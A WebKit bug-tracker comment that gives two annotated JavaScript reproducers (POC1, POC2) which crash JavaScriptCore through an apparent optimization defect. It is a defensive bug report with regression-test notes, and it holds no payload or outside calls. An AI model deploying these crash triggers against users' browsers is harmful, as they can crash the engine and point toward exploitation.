[Webkit-unassigned] [Bug 211881] JavascriptCore crashed cause of Inappropriate optimization
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Thu May 14 18:15:13 PDT 2020
https://bugs.webkit.org/show_bug.cgi?id=211881
--- Comment #3 from szwgg <5n1p3r0010 at gmail.com> ---
Here are some other PoCs:
POC1:
// Crash reproducer (POC1) attached to WebKit bug 211881. Kept byte-for-byte:
// engine reproducers are sensitive to exact statement shape, so treat this as
// a regression-test input rather than code to tidy up.
// Triage note: run it under a wall-clock timeout. The while loop below never
// terminates, so an engine without the defect hangs here instead of crashing.
function main() {
const v0 = [];
// v1 declares two parameters but is called with none; v2 and v3 are never read.
function v1(v2,v3) {
// For a plain array literal this is Array.prototype.
const v5 = v0.__proto__;
// Iterates the prototype object itself. The body is empty, and an unmodified
// Array.prototype has length 0, so nothing is yielded.
for (const v6 of v5) {
}
const v7 = [13.37,13.37];
// Mixed contents: two integers and two references to the double array v7.
const v9 = [1337,v7,1337,v7];
// shift() removes and returns the first element, so v10 is 1337.
const v10 = v9.shift();
let v12 = 0;
// v12 is never modified, so 0 < 1337 holds forever and the loop spins.
// NOTE(review): presumably this long-running loop is what gets v1 picked up by
// an optimizing tier; the report title blames an optimization but the page does
// not state the root cause. Confirm against the eventual fix.
while (v12 < v10) {
}
}
const v13 = v1();
}
main();
POC2:
// Crash reproducer (POC2) attached to WebKit bug 211881, kept byte-for-byte.
// v2 calls itself unconditionally, so on an engine without the defect the
// expected outcome is a catchable stack-exhaustion error (normally a RangeError)
// propagating out of main(), not a process crash. That difference is the
// pass/fail signal when this is used as a regression test.
function main() {
const v1 = [13.37,13.37];
// Five declared parameters, but every call passes none; none of them is read.
function v2(v3,v4,v5,v6,v7) {
// Directive prologue: v2 runs in strict mode.
'use strict'
// For a plain array literal this is Array.prototype.
const v8 = v1.__proto__;
// Empty-bodied iteration over the prototype object itself.
for (const v9 of v8) {
}
// Self-call with no base case: recursion is unbounded by construction.
const v10 = v2();
}
const v11 = v2();
}
main();